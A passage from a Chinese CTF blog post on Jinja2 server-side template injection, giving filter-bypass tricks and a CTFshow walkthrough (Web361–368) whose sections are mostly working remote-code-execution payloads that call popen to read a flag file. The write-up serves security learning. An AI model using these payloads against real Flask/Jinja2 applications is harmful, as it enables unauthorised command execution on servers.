<h3 id="绕过-2"><a href="#绕过-2" class="headerlink" title="绕过_"></a>绕过<code>_</code></h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>、通过<span class="built_in">list</span>获取字符列表，然后用pop来获取_，举个例子</span><br><span class="line">&#123;% <span class="built_in">set</span> a=(()|select|string|<span class="built_in">list</span>).pop(<span class="number">24</span>)%&#125;&#123;%<span class="built_in">print</span>(a)%&#125;</span><br><span class="line">下划线的<span class="built_in">ascii</span>码是<span class="number">24</span>, 把<span class="number">24</span>换成其他数字就可以构造其他字符</span><br><span class="line"><span class="number">2</span>、十六进制编码进行绕过，举个例子</span><br><span class="line">&#123;&#123;()[<span class="string">&quot;\x5f\x5fclass\x5f\x5f&quot;</span>]&#125;&#125; = &#123;&#123;().__class__&#125;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="绕过-3"><a href="#绕过-3" class="headerlink" title="绕过"></a>绕过"{{}}"</h3><p>有时候为了防止SSTI，可能程序员会ban掉"{{}}"，这个时候我们可以利用jinja2的语法，用"{%%}"来进行RCE。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%<span class="built_in">print</span>(<span class="string">&quot;&quot;</span>.__class__.__bases__[<span class="number">0</span>]. __subclasses__()[<span class="number">138</span>].__init__.__globals__[<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;dir&#x27;</span>).read())%&#125;</span><br></pre></td></tr></table></figure>

<p>for循环配合if语句</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%<span class="keyword">for</span> i <span class="keyword">in</span> <span class="string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()%&#125;&#123;%<span class="keyword">if</span> i.__name__ ==<span class="string">&#x27;_wrap_close&#x27;</span>%&#125;&#123;%<span class="built_in">print</span> (i.__init__.__globals__[<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;dir&#x27;</span>).read())%&#125;&#123;%endif%&#125;&#123;%endfor%&#125;</span><br></pre></td></tr></table></figure>

<h3 id="绕过-和"><a href="#绕过-和" class="headerlink" title="绕过&#39;&#39;和&quot;&quot;"></a>绕过<code>&#39;&#39;</code>和<code>&quot;&quot;</code></h3><p>利用request.args.a传入参数绕过</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__[request.args.a]&#125;&#125;&amp;a=__builtins__ 等价于 &#123;&#123;url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>]&#125;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="绕过args"><a href="#绕过args" class="headerlink" title="绕过args"></a>绕过<code>args</code></h3><p>如果args也被过滤了，那我们就利用<code>requests.cookies</code>和<code>requests.values</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Get传参 &#123;&#123;url_for.__globals__[request.cookies.a]&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>然后打开F12修改 Cookie: <code>&quot;a&quot; :__builtins__</code></p>
<h3 id="绕过数字"><a href="#绕过数字" class="headerlink" title="绕过数字"></a>绕过数字</h3><p>利用过滤器和管道符号绕过</p>
<p>官方文档：<a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/en/3.0.x/templates/#filters">https://jinja.palletsprojects.com/en/3.0.x/templates/#filters</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;(<span class="built_in">dict</span>(a=<span class="number">1</span>,b=<span class="number">1</span>,c=<span class="number">1</span>)|join|count)&#125;&#125; 等价于 &#123;&#123;<span class="number">3</span>&#125;&#125;</span><br><span class="line">原理：count(<span class="string">&quot;&quot;</span>.join(&#123;a:<span class="number">1</span>, b:<span class="number">1</span>, c:<span class="number">1</span>&#125;))</span><br></pre></td></tr></table></figure>

<p>字典中变量个数就是需要构造的数字个数，原理是通过join()函数把字典变成字符串，然后用count()函数统计字符串长度</p>
<h3 id="绕过关键字"><a href="#绕过关键字" class="headerlink" title="绕过关键字"></a>绕过关键字</h3><p>有时候class，base等关键词也会被过滤，我们同样可以通过join()函数拼接绕过</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="built_in">dict</span>(__<span class="keyword">in</span>=a,it__=a)|join&#125; 等价于 __init__</span><br></pre></td></tr></table></figure>

<p>另外也可以使用<code>~</code>连接字符，<code>~</code>是jinja2中的连接符,可以连接<code>变量</code>和<code>字符</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">&quot;__in&quot;</span>~<span class="string">&quot;it__&quot;</span>&#125;&#125; 等价于 __init__</span><br></pre></td></tr></table></figure>

<h3 id="unicode编码绕过"><a href="#unicode编码绕过" class="headerlink" title="unicode编码绕过"></a>unicode编码绕过</h3><h2 id="CTF-show-SSTI刷题"><a href="#CTF-show-SSTI刷题" class="headerlink" title="CTF show SSTI刷题"></a>CTF show SSTI刷题</h2><h3 id="Web361"><a href="#Web361" class="headerlink" title="Web361"></a>Web361</h3><p>没有任何过滤</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;<span class="string">&quot;&quot;</span>.__class__.__base__.__subclasses__()[<span class="number">132</span>].__init__.__globals__[<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;cat /flag&#x27;</span>).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="Web362"><a href="#Web362" class="headerlink" title="Web362"></a>Web362</h3><p>过滤了数字2和3</p>
<p>第一种payload</p>
<p>直接构造数字，利用乘法得到132（一般<code>os._wrap._close</code>类都在132）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;<span class="string">&quot;&quot;</span>.__class__.__base__.__subclasses__()[(<span class="built_in">dict</span>(a=<span class="number">1</span>,b=<span class="number">1</span>)|join|count)*<span class="number">66</span>].__init__.__globals__[<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;cat /flag&#x27;</span>).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>第二种payload</p>
<p>过滤器，先把变量b赋值为2</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;%<span class="built_in">set</span> b=(<span class="built_in">dict</span>(b=c,c=d)|join|count)%&#125;&#123;&#123;<span class="string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()[<span class="number">66</span>*b].__init__.__globals__[<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;tac /f*&#x27;</span>).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>第三种payload</p>
<p>利用<code>__builtins__</code>模块，x可以是任意字母</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;x.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>].<span class="built_in">eval</span>(<span class="string">&#x27;__import__(&quot;os&quot;).popen(&quot;cat /flag&quot;).read()&#x27;</span>)&#125;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="Web363"><a href="#Web363" class="headerlink" title="Web363"></a>Web363</h3><p>过滤了单引号和双引号</p>
<p>利用<code>os._wrap_close</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;().__class__.__base__.__subclasses__()[<span class="number">132</span>].__init__.__globals__[request.args.a](request.args.b).read()&#125;&#125;&amp;a=popen&amp;b=cat /f*</span><br></pre></td></tr></table></figure>

<p>利用<code>__builtins__</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;x.__init__.__globals__[request.args.a].<span class="built_in">eval</span>(request.args.b)&#125;&#125;&amp;a=__builtins__&amp;b=<span class="built_in">__import__</span>(<span class="string">&#x27;os&#x27;</span>).popen(<span class="string">&#x27;cat /f*&#x27;</span>).read()</span><br></pre></td></tr></table></figure>

<h3 id="Web364"><a href="#Web364" class="headerlink" title="Web364"></a>Web364</h3><p>过滤了单引号，双引号以及args</p>
<p>那就利用cookies</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;().__class__.__base__.__subclasses__()[<span class="number">132</span>].__init__.__globals__[request.cookies.a](request.cookies.b).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>打开f12修改cookies。a:popen, b:cat &#x2F;f*</p>
<h3 id="Web365"><a href="#Web365" class="headerlink" title="Web365"></a>Web365</h3><p>在上一题的基础上过滤了中括号</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;x.__init__.__globals__.__getitem__(request.values.b).<span class="built_in">eval</span>(request.values.a)&#125;&#125;&amp;b=__builtins__&amp;a=<span class="built_in">__import__</span>(<span class="string">&#x27;os&#x27;</span>).popen(<span class="string">&#x27;tac /flag&#x27;</span>).read()</span><br></pre></td></tr></table></figure>

<p>参数逃逸，也可以修改cookies</p>
<h3 id="Web366"><a href="#Web366" class="headerlink" title="Web366"></a>Web366</h3><p>开始过滤下划线，我们可以开始使用attr()过滤器进行绕过</p>
<p>attr()过滤器的用法</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">foo | attr(<span class="string">&#x27;bar&#x27;</span>) 等价于 foo[<span class="string">&#x27;bar&#x27;</span>]</span><br><span class="line">而foo[<span class="string">&#x27;bar&#x27;</span>]和foo.bar在jinja2下又是等价的</span><br><span class="line">lipsum | attr(<span class="string">&#x27;__globals__&#x27;</span>) 等价于 lipsum.__globals__</span><br></pre></td></tr></table></figure>

<p><img src="E:\Blog\source_posts\img\image-20230819145726677.png" alt="image-20230819145726677"></p>
<p>还是要多读文档，这两个东西是等价的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;(lipsum|attr(request.values.a)).os.popen(request.values.b).read()&#125;&#125;&amp;a=__globals__&amp;b=cat /flag</span><br><span class="line">等同于 lipsum.__globals__.os.popen(<span class="string">&#x27;cat /flag&#x27;</span>).read()</span><br></pre></td></tr></table></figure>

<h3 id="Web367"><a href="#Web367" class="headerlink" title="Web367"></a>Web367</h3><p>过滤了os，继续参数逃逸</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;(lipsum|attr(request.values.a))|attr(request.values.b)&#125;&#125;&amp;a=__globals__&amp;b=os.popen(<span class="string">&#x27;cat /flag&#x27;</span>).read()</span><br></pre></td></tr></table></figure>

<p>由于attr获取属性，所以使用这段payload没有回显，应该用以下这段payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;(lipsum|attr(request.values.c)).get(request.values.a).popen(request.values.b).read()&#125;&#125;&amp;a=os&amp;b=cat /flag&amp;c=__globals__</span><br></pre></td></tr></table></figure>

<h3 id="Web368"><a href="#Web368" class="headerlink" title="Web368"></a>Web368</h3><p>过滤了花括号，那就使用"{%%}"来执行python语句</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;%<span class="built_in">print</span>((lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read())%&#125;&amp;a=__globals__&amp;b=os&amp;c=cat /flag</span><br></pre></td></tr></table></figure>

<h3 id="Web369"><a href="#Web369" class="headerlink" title="Web369"></a>Web369</h3><p><strong>后面题目比较刁钻，有空再更新</strong></p>
<h3 id="一点小插曲"><a href="#一点小插曲" class="headerlink" title="一点小插曲"></a>一点小插曲</h3><p>Hexo使用<code>Nunjucks</code>这个模板引擎，同样使用"{{}}"和"{%%}"来包裹变量，因此在写完这篇博客进行上传操作时，hexo出现了报错，可谓是SSTI现身说法了。</p>
<p>解决方法：<a target="_blank" rel="noopener" href="https://blog.csdn.net/Calvin_zhou/article/details/109303640">https://blog.csdn.net/Calvin_zhou/article/details/109303640</a></p>
<h3 id="8-19"><a href="#8-19" class="headerlink" title="8.19"></a>8.19</h3><p>不知道为什么之前的md没有保存，又出现了渲染错误。</p>
</div><div class="article-licensing box"><div class="licensing-title"><p>ctfshow-SSTI</p><p><a href="https://dianashiba.github.io/2023/07/29/SSTI/">https://dianashiba.github.io/2023/07/29/SSTI/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>D1anash1ba</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2023-07-29</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2023-12-27</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/Web/">Web</a></div><div class="notification is-danger">You need to set <code>install_url</code> to use ShareThis. Please set it in <code>_config.yml</code>.</div></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3><div class="buttons is-centered"><a class="button donate" href="/" target="_blank" rel="noopener" data-type="afdian"><span class="icon is-small"><i class="fas fa-charging-station"></i></span><span>爱发电</span></a><a class="button donate" data-type="alipay"><span class="icon is-small"><i class="fab fa-alipay"></i></span><span>支付宝</span><span class="qrcode"><img src="/" alt="支付宝"></span></a><a class="button donate" href="/" target="_blank" rel="noopener" data-type="buymeacoffee"><span class="icon is-small"><i class="fas fa-coffee"></i></span><span>送我杯咖啡</span></a><a class="button donate" href="/" target="_blank" rel="noopener" data-type="patreon"><span class="icon is-small"><i class="fab fa-patreon"></i></span><span>Patreon</span></a><div class="notification is-danger">You forgot to set the <code>business</code> or <code>currency_code</code> for Paypal. Please set it in <code>_config.yml</code>.</div><a class="button donate" data-type="wechat"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>微信</span><span class="qrcode"><img src="/" alt="微信"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2023/10/15/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">PHP反序列化与一些例题</span></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">评论</h3><div class="notification is-danger">You forgot to set the <code>shortname</code> for Disqus. Please set it in <code>_config.yml</code>.</div></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="/img/kisskiss.jpg" alt="D1anash1ba"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">D1anash1ba</p><p class="is-size-6 is-block">嘉心糖</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>Zhejiang -&gt; Jiangsu</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives"><p class="title">8</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories"><p class="title">0</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags"><p class="title">5</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/ppoffice" target="_blank" rel="noopener">关注我</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/ppoffice"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Facebook" href="https://facebook.com"><i class="fab fa-facebook"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Twitter" href="https://twitter.com"><i class="fab fa-twitter"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Dribbble" href="https://dribbble.com"><i class="fab fa-dribbble"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="RSS" href="/"><i class="fas fa-rss"></i></a></div></div></div><!--!--><div class="card widget" data-type="links"><div class="card-content"><div class="menu"><h3 class="menu-label">链接</h3><ul class="menu-list"><li><a class="level is-mobile" href="https://hexo.io" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">Hexo</span></span><span class="level-right"><span class="level-item tag">hexo.io</span></span></a></li><li><a class="level is-mobile" href="https://bulma.io" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">Bulma</span></span><span class="level-right"><span class="level-item tag">bulma.io</span></span></a></li></ul></div></div></div><!--!--><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-01-23T09:23:53.461Z">2024-01-23</time></p><p class="title"><a href="/2024/01/23/hello-world/">Hello World</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2024-01-05T06:00:00.000Z">2024-01-05</time></p><p class="title"><a href="/2024/01/05/Pearcmd%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">Pearcmd文件包含</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-12-27T15:36:39.000Z">2023-12-27</time></p><p class="title"><a href="/2023/12/27/%E5%9F%BA%E7%A1%80%E7%AE%97%E6%B3%950x00%20%E5%9B%9E%E6%BA%AF_Dfs/">基础算法0x00 回溯_Dfs</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-11-25T02:00:39.000Z">2023-11-25</time></p><p class="title"><a href="/2023/11/25/DASCTF%202023%20&amp;%200X401%E4%B8%83%E6%9C%88%E6%9A%91%E6%9C%9F%E6%8C%91%E6%88%98%E8%B5%9B/">DASCTF 2023 &amp; 0X401七月暑期挑战赛</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-11-18T02:00:39.000Z">2023-11-18</time></p><p class="title"><a href="/2023/11/18/%E5%8F%8D%E5%BC%B9shell/">反弹Shell</a></p></div></article></div></div><div class="card widget" data-type="archives"><div class="card-content"><div class="menu"><h3 class="menu-label">归档</h3><ul class="menu-list"><li><a class="level is-mobile" href="/archives/2024/01/"><span class="level-start"><span class="level-item">一月 2024</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2023/12/"><span class="level-start"><span class="level-item">十二月 2023</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2023/11/"><span class="level-start"><span class="level-item">十一月 2023</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2023/10/"><span class="level-start"><span class="level-item">十月 2023</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2023/07/"><span class="level-start"><span class="level-item">七月 2023</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></div></div></div><div class="card widget" data-type="tags"><div class="card-content"><div class="menu"><h3 class="menu-label">标签</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/DASCTF/"><span class="tag">DASCTF</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/PHP/"><span class="tag">PHP</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Pwn/"><span class="tag">Pwn</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Web/"><span class="tag">Web</span><span class="tag">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%9F%BA%E7%A1%80%E7%AE%97%E6%B3%95/"><span class="tag">基础算法</span><span class="tag">1</span></a></div></div></div></div></div><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">订阅更新</h3><form action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open(&#039;https://feedburner.google.com/fb/a/mailverify?uri=&#039;,&#039;popupwindow&#039;,&#039;scrollbars=yes,width=550,height=520&#039;);return true"><input type="hidden" value="" name="uri"><input type="hidden" name="loc" value="en_US"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="订阅"></div></div></form></div></div></div><div class="card widget"><div class="card-content"><div class="notification is-danger">You need to set <code>client_id</code> and <code>slot_id</code> to show this AD unit. Please set it in <code>_config.yml</code>.</div></div></div><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">follow.it</h3><form action="" method="post" target="_blank"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="订阅"></div></div></form></div></div></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.svg" alt="D1anash1ba&#039;s Blog" height="28"></a><p class="is-size-7"><span>&copy; 2024 D1anash1ba</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p><p class="is-size-7">© 2022</p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "此网站使用Cookie来改善您的体验。",
          dismiss: "知道了！",
          allow: "允许使用Cookie",
          deny: "拒绝",
          link: "了解更多",
          policy: "Cookie政策",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>